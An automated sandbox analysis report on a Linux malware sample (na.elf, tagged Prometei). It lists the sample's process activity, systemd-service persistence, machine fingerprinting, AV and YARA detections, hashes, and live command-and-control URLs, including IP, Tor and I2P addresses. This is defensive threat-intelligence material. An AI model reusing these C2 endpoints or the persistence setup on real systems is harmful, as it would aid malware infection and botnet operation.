    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/918/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/12/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/12/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/13/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/13/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/6243/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/6243/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/14/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/14/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/6242/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/6242/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/15/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/15/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/16/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/16/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/17/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/17/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/18/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/18/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/1594/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/1594/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/120/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/120/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/121/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/121/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/1349/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/1349/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/1/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/1/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/122/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/122/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/243/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/243/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/123/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/123/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/2/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/2/cmdlineJump to behavior
    Source: /tmp/na.elf (PID: 6234)Shell command executed: sh -c "pgrep na.elf"Jump to behavior
    Source: /tmp/na.elf (PID: 6238)Shell command executed: sh -c "pidof na.elf"Jump to behavior
    Source: /tmp/na.elf (PID: 6242)Shell command executed: sh -c "pgrep uplugplay"Jump to behavior
    Source: /tmp/na.elf (PID: 6248)Shell command executed: sh -c "pgrep upnpsetup"Jump to behavior
    Source: /tmp/na.elf (PID: 6252)Shell command executed: sh -c "pidof upnpsetup"Jump to behavior
    Source: /tmp/na.elf (PID: 6256)Shell command executed: sh -c "systemctl daemon-reload"Jump to behavior
    Source: /tmp/na.elf (PID: 6273)Shell command executed: sh -c "systemctl enable uplugplay.service"Jump to behavior
    Source: /tmp/na.elf (PID: 6278)Shell command executed: sh -c "systemctl start uplugplay.service"Jump to behavior
    Source: /usr/sbin/uplugplay (PID: 6284)Shell command executed: sh -c "/usr/sbin/uplugplay -Dcomsvc"Jump to behavior
    Source: /usr/sbin/uplugplay (PID: 6289)Shell command executed: sh -c hostnamectlJump to behavior
    Source: /usr/sbin/uplugplay (PID: 6293)Shell command executed: sh -c hostnamectlJump to behavior
    Source: /usr/sbin/uplugplay (PID: 6428)Shell command executed: sh -c "dmidecode --type baseboard"Jump to behavior
    Source: /usr/sbin/uplugplay (PID: 6432)Shell command executed: sh -c uptimeJump to behavior
    Source: /usr/sbin/uplugplay (PID: 6436)Shell command executed: sh -c "uname -a"Jump to behavior
    Source: /usr/sbin/uplugplay (PID: 6442)Shell command executed: sh -c dmidecodeJump to behavior
    Source: /usr/sbin/uplugplay (PID: 6454)Shell command executed: sh -c uptimeJump to behavior
    Source: /usr/sbin/uplugplay (PID: 6458)Shell command executed: sh -c "uname -a"Jump to behavior
    Source: /bin/sh (PID: 6235)Pgrep executable: /usr/bin/pgrep -> pgrep na.elfJump to behavior
    Source: /bin/sh (PID: 6243)Pgrep executable: /usr/bin/pgrep -> pgrep uplugplayJump to behavior
    Source: /bin/sh (PID: 6249)Pgrep executable: /usr/bin/pgrep -> pgrep upnpsetupJump to behavior
    Source: /usr/bin/dash (PID: 6508)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.ajzlkUCIfc /tmp/tmp.ZSyPQjSoeH /tmp/tmp.jOXLM2DV0EJump to behavior
    Source: /usr/bin/dash (PID: 6509)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.ajzlkUCIfc /tmp/tmp.ZSyPQjSoeH /tmp/tmp.jOXLM2DV0EJump to behavior
    Source: /bin/sh (PID: 6257)Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reloadJump to behavior
    Source: /bin/sh (PID: 6274)Systemctl executable: /usr/bin/systemctl -> systemctl enable uplugplay.serviceJump to behavior
    Source: /bin/sh (PID: 6279)Systemctl executable: /usr/bin/systemctl -> systemctl start uplugplay.serviceJump to behavior
    Source: /usr/sbin/uplugplay (PID: 6285)Reads from proc file: /proc/cpuinfoJump to behavior
    Source: /usr/sbin/uplugplay (PID: 6285)Reads from proc file: /proc/statJump to behavior
    Source: /usr/sbin/uplugplay (PID: 6285)Reads from proc file: /proc/meminfoJump to behavior
    Source: /tmp/na.elf (PID: 6231)File: /usr/sbin/uplugplay (bits: -v usr: x grp: x all: r)Jump to behavior
    Source: /tmp/na.elf (PID: 6231)File written: /usr/sbin/uplugplayJump to dropped file
    Source: submitted sampleStderr: Created symlink /etc/systemd/system/multi-user.target.wants/uplugplay.service /lib/systemd/system/uplugplay.service.: exit code = 0

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: /tmp/na.elf (PID: 6231)File: /usr/sbin/uplugplayJump to dropped file
    Source: /bin/sh (PID: 6429)Dmidecode executable: /usr/sbin/dmidecode dmidecode --type baseboardJump to behavior
    Source: /bin/sh (PID: 6443)Dmidecode executable: /usr/sbin/dmidecode dmidecodeJump to behavior
    Source: /tmp/na.elf (PID: 6231)File: /tmp/na.elfJump to behavior
    Source: na.elfSubmission file: segment LOAD with 7.6054 entropy (max. 8.0)
    Source: na.elfSubmission file: segment LOAD with 7.943 entropy (max. 8.0)
    Source: uplugplay.12.drDropped file: segment LOAD with 7.6054 entropy (max. 8.0)
    Source: uplugplay.12.drDropped file: segment LOAD with 7.943 entropy (max. 8.0)
    Source: /usr/sbin/uplugplay (PID: 6285)Reads CPU info from proc file: /proc/cpuinfoJump to behavior
    Source: /usr/bin/pgrep (PID: 6235)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6249)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
    Source: /usr/sbin/uplugplay (PID: 6285)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
    Source: /usr/bin/uptime (PID: 6433)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
    Source: /usr/bin/uptime (PID: 6455)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
    Source: /tmp/na.elf (PID: 6231)Queries kernel information via 'uname': Jump to behavior
    Source: /usr/sbin/uplugplay (PID: 6282)Queries kernel information via 'uname': Jump to behavior
    Source: /usr/sbin/uplugplay (PID: 6285)Queries kernel information via 'uname': Jump to behavior
    Source: /usr/bin/uname (PID: 6437)Queries kernel information via 'uname': Jump to behavior
    Source: /usr/bin/uname (PID: 6459)Queries kernel information via 'uname': Jump to behavior
    Source: /lib/systemd/systemd-hostnamed (PID: 6295)Queries kernel information via 'uname': Jump to behavior

    Language, Device and Operating System Detection

    barindex
    Source: /bin/sh (PID: 6429)Dmidecode executable: /usr/sbin/dmidecode dmidecode --type baseboardJump to behavior
    Source: /bin/sh (PID: 6443)Dmidecode executable: /usr/sbin/dmidecode dmidecodeJump to behavior
    Source: /bin/sh (PID: 6437)Uname executable: /usr/bin/uname -> uname -aJump to behavior
    Source: /bin/sh (PID: 6459)Uname executable: /usr/bin/uname -> uname -aJump to behavior
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information1
    Scripting
    Valid AccountsWindows Management Instrumentation1
    Systemd Service
    1
    Systemd Service
    1
    Masquerading
    1
    OS Credential Dumping
    1
    Security Software Discovery
    Remote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/Job1
    Scripting
    Boot or Logon Initialization Scripts1
    File and Directory Permissions Modification
    LSASS Memory14
    System Information Discovery
    Remote Desktop ProtocolData from Removable Media1
    Ingress Tool Transfer
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
    Hidden Files and Directories
    Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
    Obfuscated Files or Information
    NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
    File Deletion
    LSA SecretsInternet Connection DiscoverySSHKeylogging1
    Proxy
    Scheduled TransferData Encrypted for Impact
    No configs have been found
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Number of created Files
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1649062 Sample: na.elf Startdate: 26/03/2025 Architecture: LINUX Score: 100 77 152.36.128.18, 58316, 58320, 80 NCRENUS United States 2->77 79 109.202.202.202, 80 INIT7CH Switzerland 2->79 81 3 other IPs or domains 2->81 83 Malicious sample detected (through community Yara rule) 2->83 85 Antivirus detection for dropped file 2->85 87 Antivirus / Scanner detection for submitted sample 2->87 89 3 other signatures 2->89 11 systemd uplugplay 2->11         started        13 na.elf 2->13         started        17 systemd snapd-env-generator 2->17         started        19 4 other processes 2->19 signatures3 process4 file5 21 uplugplay 11->21         started        73 /usr/sbin/uplugplay, ELF 13->73 dropped 93 Found Tor onion address 13->93 95 Drops files in suspicious directories 13->95 97 Sample deletes itself 13->97 23 na.elf sh 13->23         started        25 na.elf sh 13->25         started        27 na.elf sh 13->27         started        29 5 other processes 13->29 signatures6 process7 process8 31 uplugplay sh 21->31         started        33 sh pgrep 23->33         started        35 sh pidof 25->35         started        37 sh pgrep 27->37         started        39 sh pgrep 29->39         started        41 sh pidof 29->41         started        43 sh systemctl 29->43         started        45 2 other processes 29->45 process9 47 sh uplugplay 31->47         started        file10 75 /etc/CommId, ASCII 47->75 dropped 50 uplugplay sh 47->50         started        52 uplugplay sh 47->52         started        54 uplugplay sh 47->54         started        56 5 other processes 47->56 process11 process12 58 sh dmidecode 50->58         started        61 sh dmidecode 52->61         started        63 sh hostnamectl 54->63         started        65 sh hostnamectl 56->65         started        67 sh uptime 56->67         started        69 sh uname 56->69         started        71 2 other processes 56->71 signatures13 91 Executes the "dmidecode" command for reading DMI BIOS info like hardware or serial numbers (indicative of machine fingerprinting or VM-detection) 58->91
    SourceDetectionScannerLabelLink
    na.elf47%ReversingLabsLinux.Trojan.Generic
    na.elf100%AviraLINUX/GM.Agent.JQ
    SourceDetectionScannerLabelLink
    /usr/sbin/uplugplay100%AviraLINUX/GM.Agent.JQ
    /usr/sbin/uplugplay47%ReversingLabsLinux.Trojan.Generic
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://152.36.128.18/cgi-bin/p.cgi?r=21&i=G9IF15IMR51KTWGR100%Avira URL Cloudmalware

    Download Network PCAP: filteredfull

    No contacted domains info
    NameMaliciousAntivirus DetectionReputation
    http://152.36.128.18/cgi-bin/p.cgi?r=21&i=G9IF15IMR51KTWGRtrue
    • Avira URL Cloud: malware
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://152.36.128.18/cgi-bin/p.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rgeexdcncj.onina.elf, 6231.1.000000000052d000.0000000001575000.rw-.sdmpfalse
      high
      http://upx.sf.netna.elf, uplugplay.12.drfalse
        high
        http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgina.elf, 6231.1.000000000052d000.0000000001575000.rw-.sdmpfalse
          high
          https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgina.elf, 6231.1.000000000052d000.0000000001575000.rw-.sdmpfalse
            high
            http://152.36.128.18/cgi-bin/p.cgina.elf, 6231.1.000000000052d000.0000000001575000.rw-.sdmpfalse
              high
              http://dummy.zero/cgi-bin/prometei.cgina.elf, 6231.1.000000000052d000.0000000001575000.rw-.sdmpfalse
                high
                http://152.36.128na.elf, uplugplay.12.drfalse
                  high
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  34.249.145.219
                  unknownUnited States
                  16509AMAZON-02USfalse
                  152.36.128.18
                  unknownUnited States
                  81NCRENUStrue
                  109.202.202.202
                  unknownSwitzerland
                  13030INIT7CHfalse
                  91.189.91.43
                  unknownUnited Kingdom
                  41231CANONICAL-ASGBfalse
                  91.189.91.42
                  unknownUnited Kingdom
                  41231CANONICAL-ASGBfalse
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  34.249.145.219na.elfGet hashmaliciousPrometeiBrowse
                    na.elfGet hashmaliciousPrometeiBrowse
                      na.elfGet hashmaliciousPrometeiBrowse
                        na.elfGet hashmaliciousPrometeiBrowse
                          na.elfGet hashmaliciousPrometeiBrowse
                            GoldAge3ATOarm5.elfGet hashmaliciousUnknownBrowse
                              GoldAge3ATOarm.elfGet hashmaliciousUnknownBrowse
                                GoldAge3ATOarm7.elfGet hashmaliciousMiraiBrowse
                                  na.elfGet hashmaliciousPrometeiBrowse
                                    GoldAge3ATOarm6.elfGet hashmaliciousUnknownBrowse
                                      152.36.128.18na.elfGet hashmaliciousPrometeiBrowse
                                      • 152.36.128.18/cgi-bin/p.cgi?r=5&i=37T4IJ6W481WNK24
                                      na.elfGet hashmaliciousPrometeiBrowse
                                      • 152.36.128.18/cgi-bin/p.cgi?r=19&i=WZLOGWG7C6XKU4AC
                                      na.elfGet hashmaliciousPrometeiBrowse
                                      • 152.36.128.18/cgi-bin/p.cgi?r=19&i=B19Y1O6U1UQ0Q8UK
                                      na.elfGet hashmaliciousPrometeiBrowse
                                      • 152.36.128.18/cgi-bin/p.cgi?r=17&i=8V7Z7C29KLO25BV3
                                      na.elfGet hashmaliciousPrometeiBrowse
                                      • 152.36.128.18/cgi-bin/p.cgi?r=16&i=6NMM5995J92126D6
                                      na.elfGet hashmaliciousPrometeiBrowse
                                      • 152.36.128.18/cgi-bin/p.cgi?r=0&i=GKRG6LZ0BJ1GR43C
                                      na.elfGet hashmaliciousPrometeiBrowse
                                      • 152.36.128.18/cgi-bin/p.cgi?r=27&i=Q6696XSK657837I0
                                      na.elfGet hashmaliciousPrometeiBrowse
                                      • 152.36.128.18/cgi-bin/p.cgi?r=27&i=R46B98J342X07863
                                      na.elfGet hashmaliciousPrometeiBrowse
                                      • 152.36.128.18/cgi-bin/p.cgi?r=20&i=RDHDZU659FLOV8LK
                                      na.elfGet hashmaliciousPrometeiBrowse
                                      • 152.36.128.18/cgi-bin/p.cgi?r=28&i=QS9CSX1E79IJ37YE
                                      109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                                      • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                                      No context
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      CANONICAL-ASGBna.elfGet hashmaliciousPrometeiBrowse
                                      • 91.189.91.42
                                      na.elfGet hashmaliciousPrometeiBrowse
                                      • 91.189.91.42
                                      na.elfGet hashmaliciousPrometeiBrowse
                                      • 91.189.91.42
                                      na.elfGet hashmaliciousPrometeiBrowse
                                      • 91.189.91.42
                                      na.elfGet hashmaliciousPrometeiBrowse
                                      • 91.189.91.42
                                      GoldAge3ATOspc.elfGet hashmaliciousUnknownBrowse
                                      • 91.189.91.42
                                      na.elfGet hashmaliciousPrometeiBrowse
                                      • 91.189.91.42
                                      na.elfGet hashmaliciousPrometeiBrowse
                                      • 91.189.91.42
                                      GoldAge3ATOarm5.elfGet hashmaliciousUnknownBrowse
                                      • 91.189.91.42
                                      GoldAge3ATOarm.elfGet hashmaliciousUnknownBrowse
                                      • 91.189.91.42
                                      CANONICAL-ASGBna.elfGet hashmaliciousPrometeiBrowse
                                      • 91.189.91.42
                                      na.elfGet hashmaliciousPrometeiBrowse
                                      • 91.189.91.42
                                      na.elfGet hashmaliciousPrometeiBrowse
                                      • 91.189.91.42
                                      na.elfGet hashmaliciousPrometeiBrowse
                                      • 91.189.91.42
                                      na.elfGet hashmaliciousPrometeiBrowse
                                      • 91.189.91.42
                                      GoldAge3ATOspc.elfGet hashmaliciousUnknownBrowse
                                      • 91.189.91.42
                                      na.elfGet hashmaliciousPrometeiBrowse
                                      • 91.189.91.42
                                      na.elfGet hashmaliciousPrometeiBrowse
                                      • 91.189.91.42
                                      GoldAge3ATOarm5.elfGet hashmaliciousUnknownBrowse
                                      • 91.189.91.42
                                      GoldAge3ATOarm.elfGet hashmaliciousUnknownBrowse
                                      • 91.189.91.42
                                      INIT7CHna.elfGet hashmaliciousPrometeiBrowse
                                      • 109.202.202.202
                                      na.elfGet hashmaliciousPrometeiBrowse
                                      • 109.202.202.202
                                      na.elfGet hashmaliciousPrometeiBrowse
                                      • 109.202.202.202
                                      na.elfGet hashmaliciousPrometeiBrowse
                                      • 109.202.202.202
                                      na.elfGet hashmaliciousPrometeiBrowse
                                      • 109.202.202.202
                                      GoldAge3ATOspc.elfGet hashmaliciousUnknownBrowse
                                      • 109.202.202.202
                                      na.elfGet hashmaliciousPrometeiBrowse
                                      • 109.202.202.202
                                      na.elfGet hashmaliciousPrometeiBrowse
                                      • 109.202.202.202
                                      GoldAge3ATOarm5.elfGet hashmaliciousUnknownBrowse
                                      • 109.202.202.202
                                      GoldAge3ATOarm.elfGet hashmaliciousUnknownBrowse
                                      • 109.202.202.202
                                      AMAZON-02USna.elfGet hashmaliciousPrometeiBrowse
                                      • 34.249.145.219
                                      SeraphicSecurity_3ce70be9df6fdb942f72600d8492175bc8bcdc5b94520facce66549f8f7e1a47.msiGet hashmaliciousUnknownBrowse
                                      • 54.154.75.195
                                      na.elfGet hashmaliciousPrometeiBrowse
                                      • 34.249.145.219
                                      adani quotation request.exeGet hashmaliciousFormBookBrowse
                                      • 13.248.169.48
                                      na.elfGet hashmaliciousPrometeiBrowse
                                      • 34.249.145.219
                                      GoldAge3ATOspc.elfGet hashmaliciousUnknownBrowse
                                      • 54.171.230.55
                                      na.elfGet hashmaliciousPrometeiBrowse
                                      • 34.249.145.219
                                      na.elfGet hashmaliciousPrometeiBrowse
                                      • 34.249.145.219
                                      https://acrobat.adobe.com/id/urn:aaid:sc:EU:ed356bc9-bf5a-442b-8177-cf362f34cfc8Get hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                      • 13.249.91.72
                                      SeraphicSecurity_3ce70be9df6fdb942f72600d8492175bc8bcdc5b94520facce66549f8f7e1a47.msiGet hashmaliciousUnknownBrowse
                                      • 52.19.170.97
                                      NCRENUSna.elfGet hashmaliciousPrometeiBrowse
                                      • 152.36.128.18
                                      na.elfGet hashmaliciousPrometeiBrowse
                                      • 152.36.128.18
                                      na.elfGet hashmaliciousPrometeiBrowse
                                      • 152.36.128.18
                                      na.elfGet hashmaliciousPrometeiBrowse
                                      • 152.36.128.18
                                      na.elfGet hashmaliciousPrometeiBrowse
                                      • 152.36.128.18
                                      na.elfGet hashmaliciousPrometeiBrowse
                                      • 152.36.128.18
                                      na.elfGet hashmaliciousPrometeiBrowse
                                      • 152.36.128.18
                                      na.elfGet hashmaliciousPrometeiBrowse
                                      • 152.36.128.18
                                      na.elfGet hashmaliciousPrometeiBrowse
                                      • 152.36.128.18
                                      na.elfGet hashmaliciousPrometeiBrowse
                                      • 152.36.128.18
                                      No context
                                      No context
                                      Process:/usr/sbin/uplugplay
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):16
                                      Entropy (8bit):3.375
                                      Encrypted:false
                                      SSDEEP:3:/A+3:5
                                      MD5:03AD9EAF8229E46789941610AFCFE5FD
                                      SHA1:68CD620DA3966A397358D790E958D222978F89CD
                                      SHA-256:BA8FCFDF8C5AA77200CA2AE26F11006843F43C7635BDCBA6D4421F42725945DD
                                      SHA-512:EE8980C68B44391E07B1A3EB6ED27773D67010299E8E3B18EA3DBCBA8BB813F2AE497064B826587687A010D4E526875983676B3F8AA1B130F93295F4E2F17958
                                      Malicious:true
                                      Reputation:low
                                      Preview:G9IF15IMR51KTWGR
                                      Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                      File Type:ASCII text
                                      Category:dropped
                                      Size (bytes):76
                                      Entropy (8bit):3.7627880354948586
                                      Encrypted:false
                                      SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                      MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                      SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                      SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                      SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                                      Process:/tmp/na.elf
                                      File Type:ASCII text
                                      Category:dropped
                                      Size (bytes):145
                                      Entropy (8bit):4.769509838572339
                                      Encrypted:false
                                      SSDEEP:3:zMZa75X1PxQJqtWA1+DRvBADMikAdIgQ+aQmNJX4ev+sirSkQmWA1+DRvn:z8uXcqtWA4RZAMD+aBNdhTILQmWA4Rv
                                      MD5:8CA62D1F47880BCE036C2956C9B7B272
                                      SHA1:3BCC3A5C4FCC5B0D08C4524A59F6B8E113B62060
                                      SHA-256:C655D3D4E374FAD38313EC4262207B2D7D68A870238F203EF3C33F85E66C8E32
                                      SHA-512:4CD2D9D67151FA25E833707DEE2442C4A5F752053FC2C36EC73C0E2B734C66CA69C63FCEB47714D9ADD5B9FE2EEE1E45BE5199E2CAE7C26173E766B333877DA6
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:[Unit].Description=UPlugPlay.After=multi-user.target..[Service].Type=forking.ExecStart=/usr/sbin/uplugplay..[Install].WantedBy=multi-user.target.
                                      Process:/tmp/na.elf
                                      File Type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
                                      Category:dropped
                                      Size (bytes):435932
                                      Entropy (8bit):7.942818308318885
                                      Encrypted:false
                                      SSDEEP:6144:63fxS1fHETSACF2Gzm5DVvSHrKKRH4SCra+HWMiFbcAOXmb4Dsi6wwcitgF:25WOSACZSV6eKRH5EPiamb4DsDwwcV
                                      MD5:17C890CE6D35F2B8172C163319181902
                                      SHA1:6E0A1278C0028019A60C9A12215F1DFD79ED6C17
                                      SHA-256:BED0317927AD47D69E96CE6F9B95F8E53495C6D99DE4FB770F388627F3590F05
                                      SHA-512:FF2909F72940F26FB89C708597EA7DCD24C5AC9D357A0CAD74D5A30BC2158970D2053F894A3E381240C75038082C64D882BC2CE6EDF31D847D494237CC4AAC4F
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: Linux_Trojan_Dofloo_ac3333d1, Description: unknown, Source: /usr/sbin/uplugplay, Author: unknown
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 47%
                                      Reputation:low
                                      Preview:.ELF..............>.....`.].....@...................@.8...........................@.......@.............XH...............................PW......PW.....M.......M...............Q.td....................................................V..9UPX!............!v..p............. ..ELF......>....@.......0..'8..........W.3c..-.......o..K>...@!v..{_bo./.O7.%....o.....l..-.R..XOH....6..o..p..@... ....om.r2...D_..n.D...O...M(.S.td...POQn..PpnG.oRO!..=.0...%I.$...@.P.............y......GNU....'..l......?D....N...k.n..m"c...i......._....R.%..y...#N./ $../..p.E....v!#...._..r....K....../0.|.....p.L.........H...._...#/v..._P.C2.b.`....y!.K...x!...@p.2.".oh...`......X.B.C;P_.L/H....@...N..8?.0O.C;.`(...q.\. ..O.$ar .@%I.!v...}...I&.n.......H...H...H..t..."...9.....?..%.....D................................}....ume....]U....ME=....5-%...................&..E.t$..T$.<{....%.....H.|$...~.9.g...Sd2.OH.. ......kn(...$. 1.H9..+..t>d....4..u......~2..w..H.. mU.H.=d...o...V..`...V..=[._w.Ru6..O
                                      File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
                                      Entropy (8bit):7.942818308318885
                                      TrID:
                                      • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                                      • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                                      File name:na.elf
                                      File size:435'932 bytes
                                      MD5:17c890ce6d35f2b8172c163319181902
                                      SHA1:6e0a1278c0028019a60c9a12215f1dfd79ed6c17
                                      SHA256:bed0317927ad47d69e96ce6f9b95f8e53495c6d99de4fb770f388627f3590f05
                                      SHA512:ff2909f72940f26fb89c708597ea7dcd24c5ac9d357a0cad74d5a30bc2158970d2053f894a3e381240c75038082c64d882bc2ce6edf31d847d494237cc4aac4f
                                      SSDEEP:6144:63fxS1fHETSACF2Gzm5DVvSHrKKRH4SCra+HWMiFbcAOXmb4Dsi6wwcitgF:25WOSACZSV6eKRH5EPiamb4DsDwwcV
                                      TLSH:8D9423F8C83D2E3098169B3CBB1A826CF0A15772D9562F6EB51AF5732179F1FAC60101
                                      File Content Preview:.ELF..............>.....`.].....@...................@.8...........................@.......@.............XH...............................PW......PW.....M.......M...............Q.td....................................................V..9UPX!............!v.

                                      ELF header

                                      Class:ELF64
                                      Data:2's complement, little endian
                                      Version:1 (current)
                                      Machine:Advanced Micro Devices X86-64
                                      Version Number:0x1
                                      Type:EXEC (Executable file)
                                      OS/ABI:UNIX - System V
                                      ABI Version:0
                                      Entry Point Address:0x15de360
                                      Flags:0x0
                                      ELF Header Size:64
                                      Program Header Offset:64
                                      Program Header Size:56
                                      Number of Program Headers:3
                                      Section Header Offset:0
                                      Section Header Size:0
                                      Number of Section Headers:0
                                      Header String Table Index:0
                                      TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                      LOAD0x00x4000000x4000000x10000x11748587.60540x6RW 0x1000
                                      LOAD0x00x15750000x15750000x69e4d0x69e4d7.94300x5R E0x1000
                                      GNU_STACK0x00x00x00x00x00.00000x6RW 0x10

                                      Download Network PCAP: filteredfull

                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2025-03-26T13:44:24.316436+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.2358316152.36.128.1880TCP
                                      2025-03-26T13:44:35.169036+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.2358320152.36.128.1880TCP
                                      • Total Packets: 23
                                      • 443 (HTTPS)
                                      • 80 (HTTP)
                                      TimestampSource PortDest PortSource IPDest IP
                                      Mar 26, 2025 13:44:08.056473017 CET43928443192.168.2.2391.189.91.42
                                      Mar 26, 2025 13:44:13.687586069 CET42836443192.168.2.2391.189.91.43
                                      Mar 26, 2025 13:44:14.711426973 CET4251680192.168.2.23109.202.202.202
                                      Mar 26, 2025 13:44:23.944798946 CET5831680192.168.2.23152.36.128.18
                                      Mar 26, 2025 13:44:24.081701994 CET8058316152.36.128.18192.168.2.23
                                      Mar 26, 2025 13:44:24.081825972 CET5831680192.168.2.23152.36.128.18
                                      Mar 26, 2025 13:44:24.098093033 CET5831680192.168.2.23152.36.128.18
                                      Mar 26, 2025 13:44:24.279525042 CET8058316152.36.128.18192.168.2.23
